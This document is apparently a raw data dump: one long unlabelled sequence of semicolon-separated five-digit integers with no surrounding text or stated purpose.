31910;32689;10275;34936;64071;25832;51750;44290;21250;57684;25142;57225;46067;36054;65617;52367;17059;14474;35101;39586;47159;58497;61803;42052;35543;66665;37103;14179;54648;19723;45182;15144;14248;16776;44979;22468;34815;41603;31329;47546;26265;22546;21888;58632;40421;48331;45536;21292;27472;21315;48514;38642;50428;50840;12019;27392;55908;58263;39462;15845;51782;43082;52456;65423;66134;56109;61471;16746;31004;49102;10406;58478;19793;27378;25965;43478;32122;46592;35485;65800;47620;19376;11485;21807;50946;30917;11653;49018;64045;27902;26218;44494;24030;14871;24373;25105;35029;33173;48193;60177;35763;31898;35530;53704;38482;13728;26857;62248;14190;66162;57464;46446;45103;54376;30123;56096;22017;34375;12948;24560;61230;39375;59422;21466;45119;45787;19473;30610;31479;43702;11359;59777;53734;33659;41906;12852;65242;26693;41712;13952;63733;61172;30810;19565;33672;37948;66954;61121;25861;42072;29781;60212;53209;41664;58135;10007;15384;62740;30231;20274;42334;25575;41868;58148;37441;20186;48412;55958;12783;21295;57591;12542;22184;47552;31577;42959;24706;61749;20521;31576;21993;30091;45696;41231;37713;33610;32673;18666;30947;14447;57497;28604;21717;46055;54581;33261;18430;63259;35832;28517;15572;29072;38548;41076;27728;32915;45982;24349;14954;22652;29727;25389;60609;10138;60400;35640;18866;49495;12851;42527;35134;55969;24201;54958;49993;59037;23392;56975;46684;33262;24530;38499;28628;60537;54052;39476;61299;22226;55047;21076;57782;47149;51919;66856;30637;22943;38955;31193;54184;54678;10101;36842;14166;25026;13360;57941;52398;26014;29693;44258;25804;63729;66216;15867;51958;39664;51222;55549;34391;53860;57244;27235;61268;29991;59958;43151;24497;29477;23836;14949;32008;36900;18120;50239;59073;16002;28867;53900;28729;58978;43732;23693;46243;12004;59015;66358;10801;30349;39774;57095;54843;15100;28134;61994;31566;33383;57478;22824;33476;11810;14712;46704;35435;33664;49536;58362;16061;51729;61291;25572;54201;41198;64150;60205;63294;13969;49438;50107;38679;30786;15380;60892;46796;49754;50460;10633;16147;50188;50815;43288;54584;62232;34813;48261;61854;57465;64267;31937;64010;61610;15439;46950;23142;51839;62156;50415;14929;25828;48886;30165;21316;26565;63406;38027;13235;56098;42351;60315;61159;56664;30317;60590;38639;31454;20047;23196;30249;27050;35529;31443;65274;29579;63651;21706;34874;30148;40685;61585;52507;43932;33718;13340;42147;32577;27618;41850;53825;59318;27738;43552;54871;46180;34118;54320;29224;52315;61317;64635;36694;37418;37604;29605;19512;41111;60727;58199;20772;28415;34551;36383;56709;17503;48618;34627;34445;28245;66719;55672;46557;17185;51432;62699;29415;50261;36020;21749;10008;44393;11659;35873;43670;35338;21219;14301;56675;24656;10559;22286;32635;64273;42771;48302;36287;41181;60010;25260;43671;61754;39216;10050;12119;62086;23035;59362;44603;38888;24238;27649;47064;13386;12881;19098;35815;15120;17131;23650;61439;18284;11576;50924;44724;21534;23565;65259;22642;59182;57706;39089;30777;33799;45471;43354;40915;45761;63050;27024;66606;63042;20201;47789;19395;63905;43780;12964;45390;41410;27442;22176;27357;58957;59109;21282;19119;50498;44858;50928;11814;34833;19894;48775;42764;18101;24798;17594;43664;17512;46138;14065;43300;64732;31915;20385;57759;14415;17163;25065;17076;61005;44274;55328;33308;31251;37773;25568;20152;42401;57661;20216;20622;49242;55211;50822;16404;25807;30176;53832;61026;20949;33192;16230;19812;39710;30335;43958;47570;14367;57331;53850;55391;41414;47278;56024;15179;49477;28662;55679;59244;66914;31166;19026;17721;14239;21942;51087;62683;60701;41116;16681;46612;38326;14143;65373;21809;29691;13301;40299;31186;27241;18503;62283;29287;19549;40530;50760;25226;26829;64115;28404;22641;19499;15050;16009;64148;46145;55634;58316;22292;38208;58687;36551;18634;24188;55589;45953;46930;29882;49328;37372;24940;30648;62358;25649;42172;40076;61629;31342;48521;55104;61109;21266;40374;51814;13803;26932;55608;48972;66862;59920;58273;20674;12632;43006;37335;38515;37626;41920;28378;66152;46606;16866;24673;50140;14716;53490;53766;57522;39913;13015;44620;35915;39468;38191;21742;52163;27776;60899;33123;12462;40827;41473;24406;34416;62729;54852;39936;35349;19707;11921;39831;27502;50468;63035;15322;17452;51633;54447;46468;40576;10036;12050;26720;11650;29559;24265;16306;28715;34852;61830;27162;14040;21657;62854;13153;54261;47062;22266;10294;26456;34140;44252;61574;58661;51989;22283;36185;52802;45726;46225;66345;18916;51869;42776;18457;17188;41647;53246;47085;31302;44943;40993;34880;36872;44680;13546;34385;50273;66869;47890;33955;41695;23696;44569;41913;15019;39596;22168;43191;32035;46497;23965;18272;42924;16453;51759;31320;30659;65604;28027;28705;34969;47325;50749;36295;63019;35617;49277;13182;26471;51119;43030;24337;51653;20272;12867;26762;42867;46022;12599;12321;41623;34548;28382;26185;58541;25306;49541;31224;40343;55033;23209;55345;65751;50237;52884;46086;33866;25007;15811;46255;45969;28900;22768;52924;24732;54869;12727;40867;13308;25629;16502;40924;10607;23215;16452;12203;39976;10768;43386;49625;53301;58624;23635;19254;48417;30924;55932;17201;45752;53780;53694;14128;49563;60351;53702;60890;48727;60031;43966;65903;56327;56008;20020;26497;15054;30193;19843;37996;17621;39540;21835;47563;15553;21611;34175;52030;31097;15154;66068;38640;15704;57871;63760;42430;40533;34185;60255;38928;27364;51642;55951;13638;49796;55373;26073;31645;41418;13430;13285;44940;55171;62396;30162;32973;63048;21582;22216;30586;21718;20040;63521;48222;62824;65660;42305;33856;37894;36627;38396;23631;38764;50901;18474;42818;62462;12416;17332;10548;42723;20085;32490;37946;50677;56820;11446;54828;42983;46224;38667;10567;24090;21845;53203;18527;57308;56533;58220;18047;49411;40955;42831;39730;57754;55214;61785;31007;22219;12261;11849;28755;58853;63389;21333;56026;49142;16629;21793;12067;60895;27165;47131;39553;42400;16463;10661;25202;59356;17451;13251;54521;50976;31613;31161;20851;48469;64751;25121;59607;11317;35158;63505;19826;51741;50545;62673;36465;23331;13714;41657;43931;56421;65044;17774;30598;45703;27142;19915;22492;39224;20928;12557;12254;27905;35020;63339;22986;26504;54336;38599;22530;46634;38339;55821;55118;65232;23735;44471;28670;43821;41977;23070;42817;25766;63372;10976;22507;18357;44358;17669;35756;24069;14695;35830;12075;57765;52387;61082;12487;45548;44166;43910;32723;62143;14136;62033;51783;55030;52287;16305;37950;59893;27081;24203;37036;36428;52897;12749;28438;35548;54918;52469;33622;58498;32504;59536;20833;42284;52586;48796;12814;13841;14861;28590;10494;58429;16767;40151;47206;62844;46360;41109;15365;49362;11318;22758;39666;32054;40506;20267;20932;62837;25840;55691;19911;14480;45057;43042;52987;54086;62275;56616;33273;49704;41082;48515;58149;28547;33872;36697;20296;66482;11068;22884;17608;52517;37115;21187;13305;39083;55186;18261;16354;51342;19005;59599;35115;50172;12323;46848;37800;44063;20015;16595;19459;48884;43913;56221;35394;14129;40360;44689;31325;65906;46560;32454;37361;19616;59119;55337;34499;46150;33446;40514;37625;22703;61293;28220;17224;62227;24427;50799;25349;32007;11422;37984;15493;30207;38049;43898;20615;48695;47883;56409;38507;14614;54182;12974;28537;30338;33036;48314;66013;43991;11902;15933;27084;49473;61509;58798;46280;46569;34070;53440;33352;50513;46683;20401;55931;39524;50891;65017;65771;29358;44977;47860;33141;23937;34257;11369;61688;25940;12739;57390;45704;62645;62085;54621;39814;32625;23353;52559;19283;35235;49408;61671;49209;51022;66692;19456;28077;16524;31711;33991;49208;66443;44118;36301;48148;53757;50305;18246;62237;25454;54366;36485;24021;58867;13755;45877;21294;23145;28047;53123;53212;62525;39537;24159;55013;58034;51302;21083;38503;28328;63140;54878;25702;18093;42492;44928;36037;51812;52788;25942;28614;55218;43231;11999;40270;23273;43844;49004;55491;65332;64684;59931;16507;25324;33473;56067;20471;49967;24052;27187;65177;66959;30398;59219;32679;32433;37663;24430;40044;48677;38120;29929;39706;45237;45429;39621;63473;54257;39640;19198;33492;64977;57335;39925;54999;19317;37806;50076;60182;65848;66661;58765;38131;46247;34916;59459;11232;39291;49565;66589;20206;16370;59841;47308;21798;66042;54485;29186;55578;41550;43416;51671;19293;20492;13482;26701;46629;38222;30665;33593;61687;18343;55455;26264;24229;56749;66452;15302;64285;14206;64705;15141;44706;25315;56070;52536;32599;51569;16973;13082;11561;24785;18837;51897;32615;29383;47496;35252;40772;40386;15390;36589;14986;20573;18096;50048;48685;11836;51909;22582;42136;52198;32385;45042;49533;32010;35023;53443;22046;35487;42190;15513;34677;31307;60276;33740;58743;66373;60972;58784;37146;50681;36059;29654;32702;34276;18068;17792;61833;47347;59140;54377;38655;51842;56326;18934;49947;18577;40700;50299;66043;35934;19219;39201;42075;26050;16567;38779;50985;11531;55266;30953;24109;16715;39374;57668;52218;60641;66407;53753;28918;47434;38308;55946;34978;62531;50505;65614;43427;29551;12450;29062;38435;54325;16849;36434;66877;42797;41233;66170;27706;43948;47076;53135;43286;11141;24832;58714;36323;64997;51423;36969;22988;47868;57786;36733;49226;49643;22362;39865;51816;44150;31880;30655;11149;38466;26816;56012;34717;34757;48338;56805;38573;10990;52635;22159;59625;64931;51809;19845;49317;10270;33496;38732;55113;16604;64479;54233;51140;10115;44945;47004;19381;46742;46441;66687;59751;57634;48458;31649;62870;21504;27587;43154;66394;63084;57220;33923;10340;56780;52838;27750;63833;22968;51884;11015;45311;65218;45502;35348;46039;17422;21262;48456;54502;17320;55198;20954;56269;20024;12531;26750;35754;43978;38757;41286;60551;15309;13831;63137;60377;58064;43054;66696;39274;64271;35539;44206;24772;18905;32131;36593;57449;61170;50601;63144;46264;32006;25717;22193;22882;49238;21931;25636;16703;37684;15033;59379;57770;39695;10995;54454;29581;42956;43209;48431;22972;17636;54961;45725;52549;25298;34498;65343;55609;21307;52464;51826;64346;31250;50160;32491;33289;22167;47812;50245;19701;14186;25072;50170;29787;17384;53129;55470;20294;17250;23424;62263;53679;37005;23033;13983;37658;64662;34473;56685;58815;37847;33800;23160;63988;21179;31360;13606;51156;57841;11004;49940;33733;26689;36098;31562;25133;62048;34719;54522;47622;16228;39021;60012;12893;52862;65927;63476;21606;61123;51204;44751;47885;39186;11231;42238;36950;31072;26447;38657;21817;32441;33671;50072;33686;20896;22284;30657;53003;51064;16154;64691;45716;42356;23448;43463;14600;57987;24528;29927;50969;32150;50752;31351;12003;18494;26831;55555;59381;36055;10541;12000;28193;26830;53654;11123;27129;61530;56930;45252;42734;53800;51901;12387;36090;44551;42914;30150;35655;21459;30602;60690;42364;27930;28275;61898;49391;13287;42097;58962;10862;30742;21999;39032;54688;26224;18597;42646;22940;22885;42237;10425;24991;66432;56971;49392;28312;18419;35648;27275;53333;61881;39420;59803;31070;34984;38493;64651;37783;25673;62054;40226;47529;42614;22449;42675;15859;23412;44134;45552;45560;33353;23192;18950;47255;44180;28857;37695;39174;13263;35417;10736;65882;59960;16256;31978;21549;25899;25433;34232;39565;62043;11319;37893;52816;54788;55721;32778;21259;20582;12535;15589;26100;12002;57471;64159;14866;64645;55485;35413;57740;56167;46153;34083;57933;12102;40691;24474;14181;13130;59670;36199;60979;38591;35264;16687;43237;10292;14424;56460;10427;44714;25620;32048;40367;10043;46849;49175;35110;22866;10664;58682;11519;14550;20166;47056;53853;50274;46120;39962;21320;26054;41125;17606;15423;34494;54095;38802;54103;33469;18925;64770;26117;39463;55233;25104;10288;11146;34744;60478;38664;31156;33757;37182;37692;64384;65455;16035;62512;15722;39788;62888;57677;50099;55287;41450;12452;44997;13693;14631;52641;41509;19825;50052;19530;43264;12390;56837;64006;55699;53796;61910;64655;33218;27913;56890;44373;46102;13011;45484;37573;15157;61622;23761;54519;35879;49986;14121;30430;47304;46447;29990;11320;28292;51243;47602;11352;30385;51725;27117;66491;11365;10319;28717;57708;28125;23859;33959;29746;64620;21591;43776;18433;29082;61534;16676;50596;29375;34317;16055;56274;17090;15212;24554;29562;17722;46521;14644;44281;33332;61191;30870;55385;48755;38028;33279;50830;56871;59002;57819;58927;57638;26338;54844;55478;25156;62783;63148;16246;21065;11830;53663;39202;24609;33933;38200;14230;66801;61923;39069;21491;11274;48309;57934;50010;25986;25712;64355;65302;61628;18521;51129;18377;64351;50814;31013;35431;18953;49869;31279;50527;42497;14853;17758;32830;10962;43280;62474;42949;34697;66362;60016;54587;18562;45894;23060;15755;65647;38145;44566;48878;21897;62128;19992;47358;52021;40371;15153;62622;26392;63870;36026;43537;20768;59987;63697;28735;56403;21373;26542;21767;21596;27892;13296;24631;50232;29075;27252;13619;32521;13505;57914;48364;19766;66440;31084;61304;63159;12955;30500;30744;34286;15529;56986;35006;40898;45831;53885;57892;29531;11400;56575;14939;14383;42691;61926;54029;40048;34150;38069;27352;60051;50386;52468;57371;11467;54207;34570;47843;59170;25622;14925;58090;51247;10940;26242;33836;36429;59601;26255;62186;35018;20348;22869;57566;46238;61326;26894;11677;34423;30356;59656;25685;27585;53846;32780;27209;21005;55826;20726;31783;17396;43144;29609;26321;55293;16420;38335;22820;55727;19234;10254;52718;52765;49104;18444;55467;38268;31502;37993;35549;20133;22684;61832;59254;22187;55751;23085;32383;23419;57724;33583;33925;54702;33582;50021;51309;16007;28269;17151;60800;30533;19343;48326;10399;13906;60918;24753;65681;19073;47373;46735;49790;20658;43094;32750;58217;42806;11558;10413;44357;18386;14370;35420;42048;60408;57720;35239;32939;18392;30994;31488;25157;33038;31854;38290;55176;34260;10819;64680;46905;17305;36781;16538;43403;54809;59128;37943;42576;11376;59963;65540;38196;35494;20795;13075;22307;62120;31083;60283;12734;14495;21564;21901;15804;51278;25679;53816;32980;23221;66111;45214;13265;28095;21394;58427;19354;43375;48253;31480;14969;16026;35039;28674;34208;14386;63931;44976;64843;34104;32494;28276;61038;44925;56721;45899;51482;59620;42491;54744;23278;53426;49247;34832;62627;14635;62181;18890;47592;18295;66668;37563;29937;20383;18303;63124;22113;25667;17816;31540;41980;56111;36869;15501;24463;26828;24492;19239;38137;63551;28549;43059;29898;39781;48558;21347;37976;28869;61144;42151;22398;50885;55977;24233;32965;46880;38791;26206;61929;27910;21385;63730;36342;59107;12259;41490;11458;34299;37986;29523;23109;48765;31519;47355;56935;43266;61664;16678;59856;59227;56691;28776;60716;35948;32962;64077;48826;47165;36031;36072;23526;50383;14894;54265;60768;41796;61591;45041;45634;33454;57450;24703;61933;55140;27479;66925;52342;50396;38501;45702;29461;42793;35520;27518;26272;61648;48370;46682;38742;42599;66435;38093;45774;52931;36499;26981;23114;65296;66097;38100;39300;42987;19743;58844;52041;36471;47267;54374;31825;16302;13368;15076;26325;30567;14660;63608;40979;35241;56926;37298;26319;14962;49990;55063;46843;50538;10851;12302;26764;51823;32117;36636;36725;41722;42438;26033;10883;18144;45348;35701;37209;33207;25987;17211;39372;50728;29447;19936;50973;22830;44342;57208;36809;28142;23501;31794;22325;19533;33448;27102;16782;18982;59274;43745;57227;48387;63532;46364;39243;49520;57530;42512;37195;59019;41179;34595;60710;54312;59321;15009;30635;12422;13574;19958;16880;49508;14854;11333;41171;65139;54032;60688;20822;48450;25001;62759;42996;64299;60495;17988;52460;51691;59649;27456;30558;59840;11177;56768;21201;55417;54789;10200;20980;26975;47103;44550;42907;47848;46982;60856;25403;15459;65582;24844;29259;62441;24622;48301;29055;29920;48177;40508;48859;18972;20934;21344;25844;22056;35731;32403;45981;55584;65295;39548;44405;44182;31232;66375;64922;48733;34643;28602;12538;51625;29769;43804;55987;25251;50584;48204;26232;56134;45555;66014;39721;32157;62577;38982;52798;20349;14649;53095;61235;37332;56848;17040;61266;65554;62454;58417;23882;41151;19088;11713;50407;60204;54529;41736;24485;27359;47294;59928;14490;28052;16193;51080;31390;19665;14748;50494;58174;66797;24873;42563;61831;36768;39109;39796;30587;40894;32700;18108;18862;32415;17359;28864;32151;21712;12033;64570;33586;40224;40613;58363;50878;26655;62857;14607;51455;65542;58931;20474;66576;38390;27532;36717;11693;40222;33164;49548;18780;23252;22228;15147;12459;51425;56368;37726;28139;43714;20239;59748;57929;45849;65712;25227;23920;53818;38151;39126;50977;33057;14021;37654;55017;21323;58789;46481;24939;48770;36389;50511;44016;29360;61457;23886;44428;12013;11380;51608;25913;53383;47776;48235;17352;54030;66641;20170;41947;18203;58340;54179;30923;48726;58804;16019;25038;28281;14641;64058;57104;12827;66907;60809;41552;25099;21567;37386;65116;15772;41350;23048;66477;59004;59253;45797;53042;60910;18039;49407;62772;37357;42154;42539;11276;21825;30273;11669;30295;27695;38355;13674;24875;21366;49415;63177;33654;46278;47242;39483;57009;33719;17823;21849;63333;18872;31578;21185;65946;14099;48228;39242;37562;35953;47392;17007;53601;51850;32248;20708;53984;24290;64720;17241;18313;57545;39646;30796;15631;38305;62479;26486;17987;29216;36943;45197;28085;56336;38130;28773;39637;21960;16474;30622;34933;41637;51613;37295;47096;13200;31152;39619;38772;17709;47391;63758;52511;64152;55813;36532;66536;12637;46211;52103;22369;55577;38620;32259;39239;24135;63410;21600;49629;44707;27198;27434;12517;10698;29763;45613;29806;11038;45195;54863;32159;10699;66972;58351;27182;25303;45805;27620;57202;37513;39994;24983;30995;33566;59405;54562;47167;66036;61907;36204;20101;25781;17704;25132;41840;49026;43281;40670;43299;33340;23108;16677;15985;31718;57810;44816;49050;22244;20638;43525;22422;43689;18232;11496;54948;35588;64875;36961;16693;63491;30464;47757;33174;60671;40571;55229;22932;14960;24929;58625;19950;37016;32171;19486;33553;47822;36607;42004;52599;23464;41307;59894;50995;32563;33404;23157;17679;58727;14044;26482;28448;22600;46837;12836;56945;64483;17307;35772;20508;35400;31695;46339;64848;56312;37269;59173;34743;31221;66860;61198;60099;58127;10533;58774;27166;38952;33519;20717;41811;61069;15889;28191;44465;36741;60281;20116;30410;58635;35206;24108;58074;59945;18069;51454;31343;45967;46911;44458;66331;54342;36701;64707;28244;58671;32988;41844;36938;65711;19796;46773;57105;29394;65813;26759;39407;55465;13528;63584;31875;32289;12288;59316;64100;26731;16099;44078;26963;13774;34849;41385;31211;63478;21152;48614;22774;22708;54691;44783;28648;56007;53145;13651;33307;11262;48221;42458;43925;24744;46473;16535;17447;19870;63272;37050;38526;19065;54066;37567;15578;52964;35980;47487;40162;40899;26406;22473;46609;63954;64330;63189;44255;53243;51841;42349;58676;65163;56216;22330;42329;63403;12212;42102;11926;38823;26077;40304;59706;42840;54604;45999;23232;30899;56195;12317;66045;44288;33939;42850;10460;37794;26285;57162;52493;45810;61273;30903;63825;14581;10865;43385;43147;50218;49842;39233;41493;60928;37076;29500;28876;64074;61096;52425;18000;10394;40607;55302;32244;60190;27070;63915;34434;60574;17397;19378;61427;50645;18089;58598;46071;53911;57893;43170;60691;22977;36857;35233;60429;34645;52421;15928;46082;17058;50523;20337;36063;62505;45637;13031;19657;37479;57072;25497;52915;16983;65526;18571;45355;19725;14471;34051;44759;47473;35061;20230;19713;65869;53902;42057;44480;11223;55479;42023;43567;38045;10078;52571;45313;47753;20735;20520;14349;35452;46509;15485;66815;45096;21932;31585;50399;50949;47275;37395;34623;26956;11129;57120;62379;59434;26442;57037;32665;59930;33887;42393;26263;12613;16865;24516;12012;14522;56462;25936;24453;47716;66953;51494;20777;16795;28456;15220;48504;33223;45527;42363;55695;44617;63419;61300;26570;54308;50224;21452;50775;22043;42955;19391;57697;33840;25181;24583;22370;16920;23851;60884;32073;40797;36538;44335;22760;57228;14872;64669;44705;51023;58885;63126;11761;63598;21996;29095;28525;20436;22993;42259;32205;41887;58019;26730;56895;13837;11490;19227;26937;28807;33834;21068;56732;55966;12882;35050;47340;32535;38536;40904;15190;45976;39696;21581;41834;30086;31804;65309;62777;20145;29184;37832;66173;30582;60075;12937;28023;62083;49266;13007;10028;21040;29989;39278;13620;11391;63363;56235;11218;57968;12084;51147;26536;47682;14006;51552;52724;25467;31422;31926;63458;13330;32627;41503;37547;19429;58886;66156;20487;62872;13955;20533;48880;57185;15249;29922;65562;14291;19023;21837;65168;24465;43678;59485;22097;13645;45865;17431;33493;30475;24125;59038;30844;38170;41065;14593;33673;59718;48230;11898;11755;64696;30023;29514;19319;50791;35707;48163;40043;60565;29000;26856;48407;31984;40615;34696;48561;62738;65365;43510;24776;63396;50526;62649;13833;43706;42511;16301;46800;32611;40774;63883;59063;15005;29439;19798;23292;25914;17383;43053;58554;16872;39527;54134;46575;38994;61784;37406;48612;34788;22098;30463;63057;11893;15008;58969;15046;37398;20126;35228;10786;20413;45563;50833;45315;26715;23360;53456;17365;66233;12319;59480;43926;43894;66368;37914;44803;32497;28078;27158;26165;33462;49397;59491;24619;27063;11489;51610;43379;30493;25848;18994;66348;13815;65005;62149;11429;48965;42639;19489;55462;26873;30698;18478;39882;64978;59361;26115;43245;28762;48616;20452;34656;45433;44643;43368;64396;19348;54483;44017;45309;58739;32502;36687;48660;62724;23747;19916;12692;16040;25134;39839;48692;33029;51511;17804;47087;36056;27509;22974;54556;13680;23765;38625;42292;52693;48220;37833;31909;29189;49886;50307;20396;53186;56011;35609;34501;31447;12243;49511;21765;38409;28898;62420;58818;23834;53977;25076;49042;15746;30966;27310;18415;18949;61261;38188;11357;23475;17820;30432;19314;42861;57942;50481;49755;64730;29416;29431;21668;17514;13657;41582;46100;64826;50096;41942;24853;43521;52575;27427;66874;59075;15446;45769;12351;29162;36085;38966;61008;45664;58866;33764;63526;14595;35983;41608;43269;31361;54307;17010;30560;42752;15240;30233;17287;41995;66608;33347;22346;46816;25342;37329;57362;28775;43489;21162;34254;23679;38544;36239;13820;51969;66919;20443;43462;64462;65243;59581;60993;18963;49176;44169;39022;29116;61012;54319;26313;19965;37408;48400;34950;23150;58741;29554;10447;66159;56722;63946;63517;31324;36108;40213;27057;12092;48361;50844;40087;55973;20392;40086;43022;30841;18751;57523;44988;13604;16592;55428;27110;57343;46422;60867;23617;59749;55795;44495;37422;45089;58768;18049;59311;29194;40387;28797;16997;23064;47403;65456;57649;14392;46515;26135;57289;63867;46989;46349;35943;27815;23889;56755;26251;55720;50118;54780;56629;39732;26174;40031;47309;58550;17030;26732;55035;66374;34535;46784;52158;46070;47279;44908;61422;36172;59385;11637;25978;62539;51612;13637;66639;52732;43439;14730;52682;34758;49202;27574;35019;66249;44497;31703;57326;34612;13981;28759;31209;15045;42780;41744;30408;39329;50295;14699;32850;44386;19203;57804;25437;42499;58531;31091;39973;45379;39494;53142;20011;49117;26553;36080;27332;28667;11698;32025;33243;60368;20917;54956;55690;21384;37666;20025;19745;51135;55697;34957;10523;46323;55230;47658;53862;40478;47874;40067;10585;11074;26581;39536;10048;29779;29601;10574;26949;58938;47143;22021;61673;10553;35703;25968;41261;51562;36537;45743;60887;36985;32077;32694;29856;37544;66782;14535;10850;60223;44443;28861;31138;11005;52340;56295;22581;64379;28551;43018;29613;39571;41263;50956;46139;51946;29873;65049;46691;52065;29135;39082;23373;31586;30373;44095;49301;31416;20781;20416;14615;42989;50510;33115;26577;62528;37843;24385;48478;54362;65035;60465;27242;36992;44128;57138;39244;49456;59235;54826;63739;28204;66479;66269;19835;26002;57679;31398;54092;51457;17012;39905;30987;15399;26350;19784;66065;18293;35606;27412;30015;15320;32443;20218;29714;50461;50492;16875;47845;61128;39150;43148;38988;22493;21883;50843;49854;66328;39451;55970;20881;42124;20530;59662;11235;17000;61340;37543;11812;22522;27569;19373;27248;62405;19544;36173;61211;47869;16197;60446;45530;56883;57351;33018;38777;37219;55080;36779;57891;32488;41937;26410;43788;19502;17972;30820;25640;65020;24541;57428;49329;22862;43557;29859;46452;18088;16249;43625;60405;44065;46582;42447;59301;62670;23769;21641;51624;18338;51362;42348;19242;46881;26464;43195;50484;16138;66952;11514;18325;28337;60524;54931;27003;30677;22991;27977;15424;43634;53043;25652;60210;47284;57163;22209;37937;28995;65400;66836;61165;64142;41393;33467;21914;15526;24501;46597;19137;28451;45882;53078;45757;45690;25759;28965;62813;58952;13371;58131;65361;33295;14506;53465;30948;29327;58009;63769;36307;24005;15105;16334;61124;62241;49709;15696;27190;37315;10063;26817;24010;19392;39868;45460;16434;40968;64011;39767;62282;61894;19516;35484;41186;35086;52454;46137;51402;36276;35246;32924;35925;33483;58099;51916;20032;51501;41120;45939;35909;58485;10301;26697;43108;22452;42786;56431;53719;66684;15206;61240;61954;57682;14294;14160;35429;26229;30054;59698;48894;61135;39749;49067;22014;50029;60820;61562;48565;47049;10179;10477;32452;56101;45247;28467;65326;63110;28646;60580;45510;37771;32161;65222;60848;52020;22339;36515;27147;34690;10303;65330;16219;62337;63020;46361;31445;46080;38073;66371;66204;54663;19579;16979;55572;54117;23404;65297;12768;31073;55078;59826;44749;62108;15366;34512;62639;26316;21329;56916;13127;14161;47305;52905;58594;15903;13900;21859;54919;46811;46967;42557;25297;32192;43161;48296;54978;57233;28376;21884;58106;45917;29313;34946;60423;16170;19589;45983;46119;59908;50106;47613;12678;56176;43190;60698;32435;43429;17279;38735;62521;10205;64064;15495;14543;41866;12233;41905;61711;36425;43227;15886;54037;33620;16491;51643;38826;58356;16096;28214;40566;18734;53150;26074;19941;63921;21012;47604;60259;32472;15521;64265;60388;21650;34523;57349;46427;34881;16469;31758;35378;34626;37740;30453;37253;14198;42312;24751;20220;44023;37052;56524;56164;55723;18606;28817;51339;23370;23238;52035;12857;27809;20946;65636;47802;18901;46494;39093;12030;48785;43651;23095;13102;57287;62967;23670;41477;13773;61658;63528;44879;36008;65541;14240;30365;36267;37992;50187;13186;55989;19304;28868;58169;12371;60516;30990;10645;51208;65466;56907;50838;53533;32465;16331;10986;65394;38563;33239;23529;25184;41390;62802;39262;64777;61098;42410;18475;27730;31310;42022;61589;16144;46505;47093;28196;59068;47368;53839;25200;59136;45483;43888;16451;38971;16372;10393;44404;38576;58495;51545;13394;37933;61151;64703;65715;13211;51312;25186;47446;32957;22152;34402;32420;23878;62056;23498;59188;65126;62752;17648;60156;62423;39131;49593;33790;35621;57224;27096;51324;59568;38597;42668;55906;18731;12376;44521;19629;14340;38287;63854;61035;29752;13385;24458;27408;11679;34948;51834;36040;56260;44111;50433;35887;65344;32272;57718;31772;40975;64591;16282;34582;22169;10029;63781;45329;26522;25727;19031;12201;37546;36720;30418;18910;44964;61734;22494;58082;43479;40992;30678;65009;47598;54241;26866;40665;16004;19318;18675;54318;15684;15453;38956;18495;58020;46350;41268;64585;30524;57743;62242;17145;23149;22573;30265;34614;19938;30916;14630;37175;22245;59744;34493;16560;16140;15291;31032;30443;65118;16540;18938;52637;11143;52947;57802;63622;21441;57874;47039;28641;42085;36160;11740;48988;49006;31799;63442;13335;66194;16702;23590;25806;13613;35942;25637;30975;56061;27783;13982;63590;48490;47879;28664;22739;48360;37982;33577;50922;41814;30421;56315;51175;31316;10815;58181;40496;41610;25907;19267;44616;36893;22246;56522;16058;20010;65453;36126;15311;24377;32942;35211;18964;37488;10881;14213;18035;14112;45356;10734;44106;65370;33070;60832;14249;39977;45561;18898;53056;64610;14408;19660;56753;45464;40187;47475;59031;11053;35540;31524;15030;18986;24475;28848;38953;23338;15781;43838;27517;66922;33745;44212;24132;60699;32597;39688;53399;64109;27290;58271;22893;59685;26038;49189;62616;49858;10922;19285;38353;56734;58571;62398;56547;28791;34709;13556;44191;39690;31402;47380;24110;46782;30326;24358;41113;31633;62711;20072;42373;12769;17420;29549;54548;23359;45821;62990;38676;59460;10988;60284;17833;19600;25003;54106;65452;54076;53321;58210;64965;62464;63007;21603;25933;10968;20140;23369;32998;11205;22002;55535;16931;44190;42487;33155;36369;44273;32592;14365;21818;62485;50082;35513;54757;46877;40010;11684;26708;42318;41560;33280;38118;43977;61203;52417;62475;12381;30955;63891;52881;15710;41296;49595;66020;22261;20176;59247;16723;16410;15937;51275;52406;60415;29344;26793;28280;61491;21243;30152;58228;33761;60411;51451;24026;16640;16181;54952;48330;57299;25811;25823;29981;31485;65060;23004;44261;51744;40122;10366;33696;37436;62463;63024;10939;15337;11598;20078;37156;26563;28833;56898;21533;23336;14329;51011;60941;57859;49358;43897;26972;64795;57903;54649;33342;51882;49933;21573;28601;47608;16202;10112;19468;55019;38890;55975;35168;31768;56346;53873;64545;43235;63800;59089;13724;12710;11344;12914;42692;58811;46938;61939;44652;20558;19360;53233;63831;35198;65926;50442;39116;32777;14857;58499;49076;63818;58607;51589;37114;24922;50480;54583;27494;50984;10783;43397;66656;58073;54301;40485;65978;64496;43719;31288;41176;50293;61351;24361;12073;33952;12099;25999;63774;49827;10407;39719;53189;40925;26284;15771;60412;56851;54226;61476;37234;54738;21338;28484;47075;46455;54304;53668;59978;63302;32187;55722;64936;56565;34400;12907;45133;14178;13050;43326;63827;64840;34251;60812;32589;10605;49513;45631;65566;13273;26126;65404;31299;51560;49380;39880;27637;50490;55836;56773;46565;49708;56450;55136;23056;20774;19012;56896;32811;60322;26181;61344;55711;25381;25557;59722;46053;16437;29229;14904;63076;30775;38867;14045;27342;24279;39255;52230;66785;42414;16304;44801;16188;59951;30042;51830;49951;41357;59388;63562;41229;66969;50972;38158;51689;50624;60088;35904;33703;63614;33178;16159;25580;64317;31180;64034;37673;24713;22207;22574;32654;56839;57500;29039;56588;25376;48280;31208;63750;43360;46886;17205;49538;14537;32940;44457;46157;37896;33221;63556;30038;49306;50226;20161;12666;30394;23178;60497;64112;53544;43278;58958;40064;26535;50902;22347;57382;13808;60766;40370;39117;62778;45611;20453;28346;60589;58400;21543;17528;66791;57171;65408;56641;36079;47246;19892;50904;16242;27395;59446;62445;31961;26903;18453;16594;21772;40727;35951;61578;22437;46998;62478;40891;26040;42621;20827;13400;22627;35730;41088;10093;11407;63570;30599;30772;61889;36162;28252;57194;30517;31793;55057;46747;65858;25062;62655;28380;12262;50746;52415;10276;60649;60063;14070;22455;20440;45231;53810;34469;59403;51738;54034;38712;13890;66828;51708;51491;45437;36065;28133;55236;19423;20991;22927;45603;16128;35978;57913;27600;17694;40996;66329;40079;45266;21551;28779;45607;62401;36015;31946;18322;45367;24790;47617;45720;65609;40599;12567;16275;15743;44948;12587;19962;17342;54846;31384;